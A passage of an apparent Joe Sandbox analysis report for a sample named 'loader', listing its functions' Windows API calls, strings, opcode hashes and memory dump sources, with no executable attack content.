              • Instruction Fuzzy Hash: 40A001AA6AD203BCF10C62557D56EBA022CC4D5B617718D3EB60AA4091AB806D8A9871
              APIs
              • SetEndOfFile.KERNELBASE(?,00109104,?,?,-00001964), ref: 00109EC2
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File
              • String ID:
              • API String ID: 749574446-0
              • Opcode ID: ccd22a198fa3d12fed8a82a5718f24e2810e41aeecefa8f76f76b8422d469fbb
              • Instruction ID: b0775eda0b94c1926f198cfec9c87aa986e3e0a77cc34aa71785cc7f1f4675af
              • Opcode Fuzzy Hash: ccd22a198fa3d12fed8a82a5718f24e2810e41aeecefa8f76f76b8422d469fbb
              • Instruction Fuzzy Hash: 2EB011300A800A8ACE002B30CE088283A20EB2230A30082A0B022CA0A0CB22C002AA00
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,0011A587,C:\Users\user\Desktop,00000000,0014946A,00000006), ref: 0011A326
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 5e8ef741bfc08589b419cf0e277df2971565f497942ab9c4bc3996ba963482c2
              • Instruction ID: 4d48abf0dff1d5c221c4018b9092082fb39c1c2643395af53a901bf6aef29ea1
              • Opcode Fuzzy Hash: 5e8ef741bfc08589b419cf0e277df2971565f497942ab9c4bc3996ba963482c2
              • Instruction Fuzzy Hash: 04A0123019400656CA000B30CC09C1576505760703F0086207002C00A0CB308854A504
              APIs
              • CloseHandle.KERNELBASE(000000FF,?,?,0010968F,?,?,?,?,00131FA1,000000FF), ref: 001096EB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID:
              • API String ID: 2962429428-0
              • Opcode ID: 5b2722ba5a7ea47b7b35f066984f6ecb3d8a470813513b853a6f8f5d15e8e678
              • Instruction ID: 7feeafae900aa20d5cbe9a4d08d88d552fc4ed50389fff256f383de444853a08
              • Opcode Fuzzy Hash: 5b2722ba5a7ea47b7b35f066984f6ecb3d8a470813513b853a6f8f5d15e8e678
              • Instruction Fuzzy Hash: EAF08271556B148FDB308A24D5B8792B7E49B16735F048B1ED1FB438E1D7B6688D8F00
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0011B971
              • EndDialog.USER32(?,00000006), ref: 0011B984
              • GetDlgItem.USER32(?,0000006C), ref: 0011B9A0
              • SetFocus.USER32(00000000), ref: 0011B9A7
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0011B9E1
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0011BA18
              • FindFirstFileW.KERNEL32(?,?), ref: 0011BA2E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0011BA4C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0011BA5C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0011BA78
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0011BA94
              • _swprintf.LIBCMT ref: 0011BAC4
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0011BAD7
              • FindClose.KERNEL32(00000000), ref: 0011BADE
              • _swprintf.LIBCMT ref: 0011BB37
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0011BB4A
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0011BB67
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0011BB87
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0011BB97
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0011BBB1
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0011BBC9
              • _swprintf.LIBCMT ref: 0011BBF5
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0011BC08
              • _swprintf.LIBCMT ref: 0011BC5C
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0011BC6F
                • Part of subcall function 0011A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0011A662
                • Part of subcall function 0011A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0013E600,?,?), ref: 0011A6B1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: 57ef432a1c113f5511300c0abae43dc45e94a8c5d1651ed5fcfa6ba372e706bd
              • Instruction ID: 9fe9effd722e57b8aa677c3ff1ee5909e78ba5443e7bccb9cdd5d949511fd283
              • Opcode Fuzzy Hash: 57ef432a1c113f5511300c0abae43dc45e94a8c5d1651ed5fcfa6ba372e706bd
              • Instruction Fuzzy Hash: 2D91B4B2248348BBD2359BA0DC89FFB77ACEB4A704F040829F789D2481D775A6458762
              APIs
              • __EH_prolog.LIBCMT ref: 00107191
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001072F1
              • CloseHandle.KERNEL32(00000000), ref: 00107301
                • Part of subcall function 00107BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00107C04
                • Part of subcall function 00107BF5: GetLastError.KERNEL32 ref: 00107C4A
                • Part of subcall function 00107BF5: CloseHandle.KERNEL32(?), ref: 00107C59
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0010730C
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0010741A
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00107446
              • CloseHandle.KERNEL32(?), ref: 00107457
              • GetLastError.KERNEL32 ref: 00107467
              • RemoveDirectoryW.KERNEL32(?), ref: 001074B3
              • DeleteFileW.KERNEL32(?), ref: 001074DB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: a60cd7aa4bfb2cb99a48b5794f9775d4c4d80296db141596d1e6d1d2c7a80ddf
              • Instruction ID: 315b63417f17704473b7fdae484e253c1e0ba2a4e0ee58c296296b94d6067af8
              • Opcode Fuzzy Hash: a60cd7aa4bfb2cb99a48b5794f9775d4c4d80296db141596d1e6d1d2c7a80ddf
              • Instruction Fuzzy Hash: B5B1E271D04215ABDF25DBA0DC81BEE77B8BF14300F004469F999E71C2D7B4AA89CBA0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID: CMT$h%u$hc%u
              • API String ID: 3004599000-3282847064
              • Opcode ID: 8cad8b500298c7ed63a39881906c43fd8dd74df968cf33c772ccf8c791abc308
              • Instruction ID: f888b42151ce8c649acdbdbdf8d4a6be70085a7297d0ebb244eca91d955f5fd6
              • Opcode Fuzzy Hash: 8cad8b500298c7ed63a39881906c43fd8dd74df968cf33c772ccf8c791abc308
              • Instruction Fuzzy Hash: 6632A5716102849FDF14DF64C895AEA37A9AF24300F04457EFDDACB2C2DBB49A49CB60
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$^PpL
              • API String ID: 4168288129-1628670806
              • Opcode ID: 0c06fa0bc50813f86374d5cb927fef2c5bbb38bf313622cf18de84c8c9365f84
              • Instruction ID: 7a44b3cc32f7b6696281e405220ef886d6c0c10b195f9792f2dc0f8950f83126
              • Opcode Fuzzy Hash: 0c06fa0bc50813f86374d5cb927fef2c5bbb38bf313622cf18de84c8c9365f84
              • Instruction Fuzzy Hash: 55C23A72E086288FDB29CE28ED407EAB7B5FB45315F1541EAD84DE7240E774AE918F40
              APIs
              • __EH_prolog.LIBCMT ref: 001027F1
              • _strlen.LIBCMT ref: 00102D7F
                • Part of subcall function 0011137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0010B652,00000000,?,?,?,0001040A), ref: 00111396
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00102EE0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
              • String ID: CMT
              • API String ID: 1706572503-2756464174
              • Opcode ID: 89b5a235816c6dfbb66aea382c7b3af61553a4db45f69b5cc0ebacdf2bebd4c2
              • Instruction ID: aa674232d79dff5492404fb86ec7c3f1fd57530bb1a6cf746f4f29a4396c3522
              • Opcode Fuzzy Hash: 89b5a235816c6dfbb66aea382c7b3af61553a4db45f69b5cc0ebacdf2bebd4c2
              • Instruction Fuzzy Hash: B662F4716002448FDF29DF74C8996EA3BE5AF68304F09457DECDA8B2C6DBB0A945CB50
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00128767
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00128771
              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0012877E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID: ^PpL
              • API String ID: 3906539128-914357616
              • Opcode ID: ae4be7f93b689d9dfa8a843acd8103568a0dd60537f6cae9606f7cc81d7a1283
              • Instruction ID: e8aa224b7e9dca372e0dabcfe6d863429372aac65e6f86b72800ba05df374b55
              • Opcode Fuzzy Hash: ae4be7f93b689d9dfa8a843acd8103568a0dd60537f6cae9606f7cc81d7a1283
              • Instruction Fuzzy Hash: A731B2759012289BCB25DF68D889BDCBBB8BF18310F5041EAE81CA7251EB309BC58F45
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
              • Instruction ID: 71de03ca78cd3f93847087b3f4ccccdfa8fd822f929037c0211696f521a22e5e
              • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
              • Instruction Fuzzy Hash: 6F023D71E001299FDF14CFA9D9906AEFBF1EF88314F254269D919E7384D731AA51CB80
              APIs
              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0011A662
              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0013E600,?,?), ref: 0011A6B1
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FormatInfoLocaleNumber
              • String ID:
              • API String ID: 2169056816-0
              • Opcode ID: c704e8bfceb8c98eafd99d9af733ba3991dad7bb4e30abeeb5d4cb3a0a3185c4
              • Instruction ID: 6768ba711cdf082fef55ebef16e34ab7d133f34560c2d8283908cb17085d6f16
              • Opcode Fuzzy Hash: c704e8bfceb8c98eafd99d9af733ba3991dad7bb4e30abeeb5d4cb3a0a3185c4
              • Instruction Fuzzy Hash: 95015E76500308BAD710CFA5EC06F9B77FCEF19711F004422FA1497590D3B09A64C7A5
              APIs
              • GetLastError.KERNEL32(0011117C,?,00000200), ref: 00106EC9
              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00106EEA
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: 7c9239b3777014f516d86eb807bda225836a08860b202c8b7ff0fecc5bce4922
              • Instruction ID: 0fd67ea1316870e3341c508a4946b3fbff4a4baf48aea3477ce2b8c3d051239a
              • Opcode Fuzzy Hash: 7c9239b3777014f516d86eb807bda225836a08860b202c8b7ff0fecc5bce4922
              • Instruction Fuzzy Hash: E6D0C7353C4302BFEA154B74CC05F277B546755B42F108514B366D94D0C6B090649619
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0013118F,?,?,00000008,?,?,00130E2F,00000000), ref: 001313C1
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: dbc33a3a8f66f01969771f56eab5d16911e5e7875119439dc9aa9e38cfb0b43e
              • Instruction ID: 7314003ce28790e3e3902a33c75ec1b9118e9e6e77b28eeff82ce2ec4c5f7326
              • Opcode Fuzzy Hash: dbc33a3a8f66f01969771f56eab5d16911e5e7875119439dc9aa9e38cfb0b43e
              • Instruction Fuzzy Hash: CEB14C71610609EFD719CF28C48ABA57BE0FF45364F298658E9D9CF2A1C335E992CB40
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: gj
              • API String ID: 0-4203073231
              • Opcode ID: 02951a193916a6d6dcc611bcbd474706276eefb64e5fee717c509395137222b2
              • Instruction ID: 7d8fe960ac7b40dd8d811a3a0ddc6de9af71d8058b6c6f2b874d7c29a18ecbb9
              • Opcode Fuzzy Hash: 02951a193916a6d6dcc611bcbd474706276eefb64e5fee717c509395137222b2
              • Instruction Fuzzy Hash: 98F1B3B1A083418FD748CF29D880A1AFBE1BFCC208F15896EF598D7711E734EA558B56
              APIs
              • GetVersionExW.KERNEL32(?), ref: 0010AD1A
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Version
              • String ID:
              • API String ID: 1889659487-0
              • Opcode ID: 38df2511797a6bd4901027980de4c5d09258d23e2b2d5cf70276bba12de1a454
              • Instruction ID: df4ef2992fca1f29ffce9aa05410d9b320bac6f3701640c37d33d1c10f619280
              • Opcode Fuzzy Hash: 38df2511797a6bd4901027980de4c5d09258d23e2b2d5cf70276bba12de1a454
              • Instruction Fuzzy Hash: CDF01DB490030C8BC728CB68ED416E973B5FB5D711F6006A5EA5943BA4D7B0AD858F51
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0011EAC5), ref: 0011F068
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 908a10c98f9a84f41054bd5730f7b70cc7f31d3f33c9ad96d5e3343452339301
              • Instruction ID: 75157e92fd5ba6baeaaa8ad3b634a7562066e98f9038a811addbb79c54e153bc
              • Opcode Fuzzy Hash: 908a10c98f9a84f41054bd5730f7b70cc7f31d3f33c9ad96d5e3343452339301
              • Instruction Fuzzy Hash:
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
